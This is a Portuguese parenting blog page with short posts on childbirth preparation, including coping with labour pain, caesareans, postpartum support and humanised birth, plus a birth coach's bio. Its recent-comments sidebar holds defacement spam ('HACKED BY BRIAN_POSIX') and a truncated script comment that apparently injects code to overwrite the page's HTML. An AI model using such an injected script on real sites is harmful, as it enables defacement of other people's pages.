O Melhor das Mães @ 19:08

Seg, 11/07/11

A dor representa um dos grandes medos das mulheres grávidas. Para que o parto possa decorrer de uma forma mais suave e tranquila, importa conhecer as condicionantes e os processos fisiológicos que estão na sua origem, e aprender  formas de gerir a dor em cada etapa do trabalho de parto. Tal com o onome indica: trabalho de parto, vamos saber nesta rubrica como podemos trabalhar em colaboração com o nosso corpo e a dor, para que o parto se possa tornar num momento gratificante!

 




O Melhor das Mães @ 19:10

Seg, 02/05/11

Num desafio em que tudo é incerto e escapa ao nosso controlo, só um sentimento interno de paz e confiança, permite que nos sintamos centradas e enfrentemos o parto com segurança. Mais. A preparação mental e emocional é uma valiosa ajuda para eliminar os medos, trabalhar e relativizar a dor, construir profundos laços com o bebé e familiarizar-se com todo o processo.

 

Construir uma atitude de confiança e a consciência da capacidade de toda a mulher para dar à luz são o objectivo último de simples técnicas de relaxamento, visualização e programação e os ingredientes para um parto harmonioso e gratificante!

 


Tags:


O Melhor das Mães @ 17:36

Seg, 28/03/11

Num momento único e não repetível na vida de uma mulher, como é a gravidez, há formas divertidas de fazer perdurar no tempo esse momento. Manter um diário, fazer um objecto pessoal para o seu bebé (que pode ser partilhado por amigas e familiares), fazer uma sessão fotográfica, um molde a barriga em gesso e pintar, ou torna-lo num objecto decorativo, são alguns exemplos disso mesmo. É precisamente dessas memórias que falamos na próxima rubrica.

Tags:


O Melhor das Mães @ 19:03

Seg, 14/02/11

Vários motivos conduzem as mulheres às cesareanas. Se para algumas representa uma escolha assumida e pondereada, o mais comum é a cirurgia de emergência, que surge de surpresa e representa muitas vezes, um choque para os pais. Quando o parto toma rumos inesperados e aparentemente não há mais nada que se possa fazer, os pais, e a mãe principalmente, tem de aprender a estar aberta a todas as possibilidades. A estar presente para abraçar a experiência e atravessar esta situação desconhecida com uma forte energia de confiança para receber o novo bebé.


Tags:


O Melhor das Mães @ 19:02

Seg, 17/01/11

A chegada de um bebé ao mundo é motivo de celebração e grande alegria para toda a família. Porém, é um evento que muda o curso de vida dos pais e os primeiros meses após o parto representam uma transição emocional e psicológica profunda para um novo estilo de vida e na construção de uma nova identidade. É por isso essencial que os pais possam receber suporte físico e emocional nesses primeiros tempos, ajudando-os a gerirem o seu novo dia-a-dia, a sentirem-se seguros, confiantes e com tempo para cuidarem do seu bebé e criarem verdadeiros laços de família.


Tags:


O Melhor das Mães @ 19:02

Seg, 20/12/10

O parto tem evoluído muito nos últimos anos, principalmente no sentido de maior  segurança. Hoje em dia, continua a evoluir mas re-tomando uma nova dimensão: a  consciência  de que o parto não é apenas um acto clínico, mas sim o nascimento de uma nova vida. Representa um crescimento, uma transição psíquica  e emocional profundíssima para  a mulher, o primeiro encontro entre mãe e filho, e o surgir de de uma nova família. Isto significa que a mulher deve poder aceder à experiência de parto que para ela seja a mais gratificante, e neste sentido o parto natural salienta-se como o mais recomendado pela OMS em termos de bem-estar físico e emocional para mãe e bebé.

Convidados da rubrica: António Ferreira, enfermeiro obstetra do Hospital de Coimbra.


Tags:


O Melhor das Mães @ 19:01

Seg, 25/10/10

Não se trata de um método respiratório ou psicoprofilático, ou de conhecimentos sobre puericultura em geral, embora os inclua a todos. Esta é uma abordagem de dentro para fora e tem como ponto de partida uma viagem silenciosa dentro de si, na busca do que sente que precisa, receia e imagina para o seu parto e no papel de mãe. Entre megas de informação obstétrica, acreditamos na possibilidade de escutar e validar as necessidades da mãe, e num desafio em que tudo é incerto, um sentimento de confiança, permite criar um parto tranquilo e harmonioso – e é para alcançar esse ponto que as mulheres se devem preparar.

 


 

 

 

 

Maternidade consciente, Parto Humanizado:

Ao longo das próximas rubricas vamos falar sobre gravidez, parto e maternidade.

Melhor, sobre as melhores escolhas, o que de melhor as mães podem eleger para esta fase tão única e especial da vida da mulher. Sempre na perspectiva de uma maternidade mais inspirada, consciente e informada. Sobretudo gostava de deixar como nota de fundo uma nova forma de viver o parto e a maternidade, que acontece no mundo, e que se começa a verificar em Portugal no sentido de um parto mais humanizado.

 

 

 


 


Tags:


O Melhor das Mães @ 11:10

Sex, 15/10/10

Cláudia Borges vive na zona de Lisboa  e é mãe de duas meninas.

Com formação na área da psicologia e desenvolvimento pessoal, prepara, inspira e apoia mulheres no parto e na maternidade.
Utilizando por base métodos tão actuais como Birthing From Within e Gentle Birth Method* defende um parto humanizado e de uma maternidade consciente e gratificante.

Consultas e grupos em Lisboa, Cascais e Évora.


Contacto:  http://creatingbirth.blogspot.com


*Nascer a partir de dentro e Método para um parto suave



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO